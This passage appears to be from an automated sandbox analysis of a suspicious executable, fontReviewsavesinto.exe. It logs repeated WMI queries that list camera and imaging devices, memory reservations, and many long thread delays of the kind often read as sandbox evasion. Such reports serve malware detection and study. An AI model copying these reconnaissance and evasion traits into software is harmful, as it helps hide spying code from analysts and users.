                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeMemory allocated: 2880000 memory reserve | memory write watchJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeMemory allocated: 1AAD0000 memory reserve | memory write watchJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeMemory allocated: 1630000 memory reserve | memory write watchJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeMemory allocated: 1B2D0000 memory reserve | memory write watchJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 600000Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 599874Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 599765Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 599656Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 599546Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 599437Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 599328Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 599218Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 599109Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 599000Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 598890Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 598781Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 3600000Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 598672Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 598562Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 598453Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 598344Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 598219Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 598109Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 598000Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 597890Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 597781Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 597672Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 597562Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 597453Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 597344Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 597234Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 597124Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 597015Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 596906Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 596797Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 596687Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 596578Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 596467Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 596359Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 596250Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 596140Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 596029Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 595752Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 595609Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 595481Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 595374Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 595265Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 595156Jump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeThread delayed: delay time: 595033Jump to behavior
